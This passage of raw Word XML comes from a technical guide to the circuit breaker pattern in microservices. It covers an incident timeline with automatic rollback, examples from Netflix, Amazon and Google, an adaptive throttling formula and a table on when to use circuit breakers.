    <w:p w14:paraId="2C57F0FB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:27:05 - checkout-service circuit breaker to payment-service OPENS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C49E1C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:27:10 - Auto-rollback triggered (correlated: deployment + circuit open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2693F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:28:00 - payment-service v2.3.0 restored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC5DE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:28:30 - Circuit breaker transitions to HALF-OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AE305" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:28:35 - Probe succeeds → Circuit CLOSES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379425F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>14:28:40 - System fully recovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49802A0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated response:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> If a circuit breaker opens within 5 minutes of a deployment to that service → automatic rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DA0199" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="4EAEC051">
          <v:rect id="_x0000_i4259" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C325B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Real-World Circuit Breaker Implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4BCDB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 Netflix (Where the Pattern Was Popularized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDD155" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scale:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Hundreds of microservices, billions of calls per day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184976D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B1F981" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every external and internal dependency wrapped in a circuit breaker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD9996" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Thread pool isolation per dependency (Hystrix model).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9F386" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Real-time dashboard showing all circuit breakers across all services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C021F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Automated responses to circuit breaker events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E3C2BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key lesson from Netflix:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> "Everything fails all the time." Circuit breakers aren't for exceptional cases — they're for normal operation. At Netflix's scale, something is ALWAYS failing. Circuit breakers make this manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2CDD6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 Amazon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8F6A47" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The "cell-based architecture":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECEFFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Services are divided into "cells" (independent units).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEF68E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Each cell has its own circuit breakers to its dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080569ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If a dependency fails for one cell, other cells are unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD4F63" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Combined with blast-radius reduction: even if a circuit trips, it only affects one cell's worth of customers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439B5BD6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.3 Google (Approaches Problem Differently)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1EF689" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google's internal systems rely more on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4BEC9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Adaptive throttling (client-side): "If my recent requests are failing at 50%, reduce my sending rate by 50%."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277F6C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server-side overload protection: Backend actively rejects requests when overwhelmed (returns overload errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F429D8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1092"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The combination achieves similar goals to circuit breaking without a formal state machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A36791" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adaptive throttling formula (from Google SRE book):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC8FFD0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560ABC1B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>client_request_rate = max(0, (requests - K × accepts) / (requests + 1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF4713" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B699FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>requests = total requests sent recently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E62F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>accepts = requests that were accepted (not rejected/failed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60667DD5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>K = multiplier (typically 2). Higher K = less aggressive throttling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F63CC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When accepts approaches requests (few failures): throttling rate → 0 (send normally). When accepts drops (many failures): throttling rate increases (self-limit sending rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8592ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is essentially a "continuous" circuit breaker</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — instead of binary open/closed, it continuously adjusts the sending rate proportional to the observed failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02626DA3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="2114B852">
          <v:rect id="_x0000_i4260" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514AA09" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Circuit Breaker Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CBC801" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 When to Use a Circuit Breaker</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51"/>
        <w:gridCol w:w="1967"/>
        <w:gridCol w:w="4932"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1A3F68A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C4A9B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Scenario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AF21FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Circuit Breaker?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B74784" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2D33882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9F6089" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Calling an external API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471746" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> Yes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54B869" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>External APIs are unpredictable; failures can be prolonged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1F57193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FA6116" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Calling an internal microservice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6B4F94" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> Yes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D89849" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Services fail; prevent cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3776971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6F0DA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Database calls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6B7BC3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> Sometimes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77B565" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>DB failures cascade quickly; but consider retry + connection pool exhaustion as the real issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1B372E7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8F3E6C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Reading from cache (Redis)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5A92BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> Maybe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BC773D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>If cache is down, falling back to DB is expensive. CB can prevent overwhelming DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="09C238A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FD38E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>File system operations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7CFB4A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> Rarely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C12C03" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Failures are typically systemic (disk full); CB doesn't help</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="09B30BE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04E031" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>CPU-bound computation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19C379" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> No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6C9C40" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Nothing to "protect" — it's your own CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="04C2A7F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DD8AA5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Calling localhost services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1CA5F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="006E6644">
              <w:t xml:space="preserve"> Rarely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18069E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Same machine, unlikely to have network-level failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB2EDB9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.2 When NOT to Use a Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56AC1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The operation has no meaningful fallback and MUST succeed:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> In this case, retries with backoff are more appropriate than failing fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115F9E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The failure is always transient (&lt; 1 second):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> If the downstream always recovers in milliseconds, a retry is cheaper than circuit breaking infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320E843" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>You control both sides and can fix the issue immediately:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> If it's all your code and you can deploy a fix in minutes, circuit breaking may be unnecessary overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B27E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The dependent call is optional and already has a timeout &lt; 100ms:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The cost of the timeout is already low; circuit breaking overhead may not be worth it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6E537" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="32EFF3E9">
          <v:rect id="_x0000_i4261" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56846B6F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A764A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Circuit Breaker is the system's immune response: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902"/>
        <w:gridCol w:w="4195"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="28713CD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38BD1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Biological Analogy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BBDF46" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
